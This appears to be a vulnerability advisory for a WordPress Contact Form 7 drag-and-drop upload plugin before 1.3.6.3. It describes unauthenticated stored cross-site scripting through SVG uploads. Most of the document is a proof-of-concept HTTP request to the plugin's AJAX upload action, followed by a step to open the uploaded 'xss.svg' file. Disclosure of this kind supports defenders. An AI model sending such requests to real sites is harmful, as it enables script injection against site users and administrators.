Drag and Drop Multiple File Upload - Contact Form 7 < 1.3.6.3 - Unauthenticated Stored XSS

The plugin allows SVG files to be uploaded by default via the dnd_codedropz_upload AJAX action, which could lead to Stored Cross-Site Scripting issue

PoC

POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161 Content-Length: 655 Connection: close -----------------------------92633278134516118923780781161 Content-Disposition: form-data; name=“size_limit” 10485760 -----------------------------92633278134516118923780781161 Content-Disposition: form-data; name=“action” dnd_codedropz_upload -----------------------------92633278134516118923780781161 Content-Disposition: form-data; name=“type” click -----------------------------92633278134516118923780781161 Content-Disposition: form-data; name=“upload-file”; filename=“xss.svg” Content-Type: image/jpeg -----------------------------92633278134516118923780781161-- Then open https://example.com/wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/xss.svg